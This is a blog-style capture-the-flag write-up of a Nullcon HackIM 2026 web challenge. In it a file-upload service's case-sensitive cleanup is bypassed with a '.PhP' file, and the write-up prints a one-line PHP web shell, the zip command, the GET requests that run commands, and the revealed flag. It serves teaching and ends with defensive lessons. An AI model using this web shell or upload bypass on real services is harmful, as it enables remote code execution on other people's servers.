mis4nthr0pia

Nullcon HackIM CTF Goa 2026 – Virus Analyzer

Category: Web

Difficulty: Medium

1. Challenge Overview

The challenge presents a web service called Virus Analyzer. The UI is sleek and professional, mimicking a security tool. It invites users to upload a .zip archive, which it promises to extract and analyze for malicious content. Upon visiting the site, I noticed there was no source code provided, forcing a black-box approach.

The core functionality is simple:

  1. Upload a ZIP.
  2. The server extracts it to a random subdirectory in /uploads/.
  3. It lists the files and provides links to view them.
  4. It claims to be “safe” because it deletes uploaded files.

2. Vulnerability Analysis

The Discovery Phase (Step-by-Step Testing)

Since I didn’t have the source code initially, I had to poke at the server’s behavior:

  1. Standard File Upload: I uploaded a ZIP containing test.txt. It worked perfectly, and I could view the file at /uploads/[ID]/test.txt.
  2. The “PHP” Block Test: I uploaded a ZIP containing info.php (with <?php phpinfo(); ?>).
  • Observation: The results page showed info.php was extracted, but clicking the link resulted in a 404 Not Found.
  • Conclusion: There is an automated cleanup script deleting .php files almost immediately.
  1. The Case-Sensitivity Test: I know that many Linux-based cleanup scripts use standard find commands. I decided to test if the filter was case-sensitive by uploading a ZIP with cmd.PhP.
  • Observation: This file was NOT deleted. I was able to access the file and it was successfully parsed as PHP by the server.

Code Confirmation

Once I had a working shell, I ran cat ../../index.php to see the actual logic. The “Aha!” moment came from this line:

// Safety measure: delete all .php files after 10 seconds
$cmd = "(sleep 0 && find " . escapeshellarg($extract_dir) . " -name '*.php' -delete ) > /dev/null 2>&1 &";
exec($cmd);

The developer used -name '*.php', which is strictly case-sensitive in Linux. Files ending in .PhP or .PHP completely bypass this security rule.

3. Developing the Exploit

I needed to weaponize the case-sensitivity bypass to get full control over the server.

  1. The Payload: I created a minimalist PHP web shell to minimize the chance of being caught by any actual “virus” scanners:
<?=`$_GET[0]`?>
  1. The Naming: I named the file cmd.PhP.
  2. The Delivery: I zipped the file using the command line:
zip exploit.zip cmd.PhP

4. The PoC (Proof of Concept)

  1. Upload: I uploaded exploit.zip via the web interface.
  2. Identify ID: The site redirected me to a results page with the path: /uploads/af3a98fdf74ef742/.
  3. Execution: I tested the shell by listing the root directory to see what I was working with.
  • URL: http://52.59.124.14:5008/uploads/af3a98fdf74ef742/cmd.PhP?0=ls /
  • Result: I saw a standard Linux directory structure and a very interesting flag.txt in the root.

5. The Winning Payload

With the location of the flag confirmed, the final payload was simple:

Command:

GET /uploads/af3a98fdf74ef742/cmd.PhP?0=cat+/flag.txt

6. Result

The server executed the cat command and returned the flag content:

Flag: ENO{cl34nup_scrip7s_4r3_n07_3n0ugh_8281}

Key Takeaways:

  • Blacklisting is not Security: Relying on specific file extensions for safety is a losing game.
  • Find Command Nuance: In Linux, -name is case-sensitive. To be secure, the developer should have used -iname.
  • Execution Context: The web server was configured to parse any case variation of .php as a script, while the cleanup script was only looking for one specific version.
Posted in:

Leave a Reply

Your email address will not be published. Required fields are marked *